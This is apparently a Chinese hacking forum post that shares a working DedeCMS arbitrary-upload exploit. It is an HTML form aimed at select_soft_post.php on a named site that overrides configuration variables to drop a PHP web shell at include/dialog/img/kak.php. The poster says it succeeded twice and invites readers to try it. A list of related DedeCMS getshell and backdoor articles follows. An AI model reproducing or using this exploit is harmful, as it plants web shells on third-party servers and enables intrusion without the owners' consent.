漏洞是存在的,但网上用此版本的比较少,有都好像补了?试了两个也成功了!
<form action='http://www.mengtesuoli.com/include/dialog/select_soft_post.php?cfg_basedir=../../include/dialog/img&cfg_imgtype=php&cfg_soft_dir=m&newname=kak.php&cfg_not_allowall=ff&cfg_softtype=php&cfg_mediatype=php' method='post' name='form1' enctype='multipart/form-data'>
<input name='uploadfile' type='FILE' class='FileButton' size='28'>
<input type='submit' name='Submit' value='开始上传'>
</form>
大家可以试试,别说一个都没成功,好像骗你们就不好了,所以特开此贴!!
shell地址在include/dialog/img/kak.php
来源:网络
只显示10条记录相关文章
DEDECMS爆严重安全漏洞 免账号密码直接进入后台 (浏览: 21024, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35446, 评论: 0)
dedecms 管理后台程序下载漏洞 (浏览: 13252, 评论: 0)
dedecms默认的注册用户 (浏览: 12970, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13763, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22243, 评论: 0)
蛋疼的DEDE后台拿Shell (浏览: 14572, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35446, 评论: 0)
dedecms 管理后台程序下载漏洞 (浏览: 13252, 评论: 0)
dedecms默认的注册用户 (浏览: 12970, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13763, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22243, 评论: 0)
蛋疼的DEDE后台拿Shell (浏览: 14572, 评论: 0)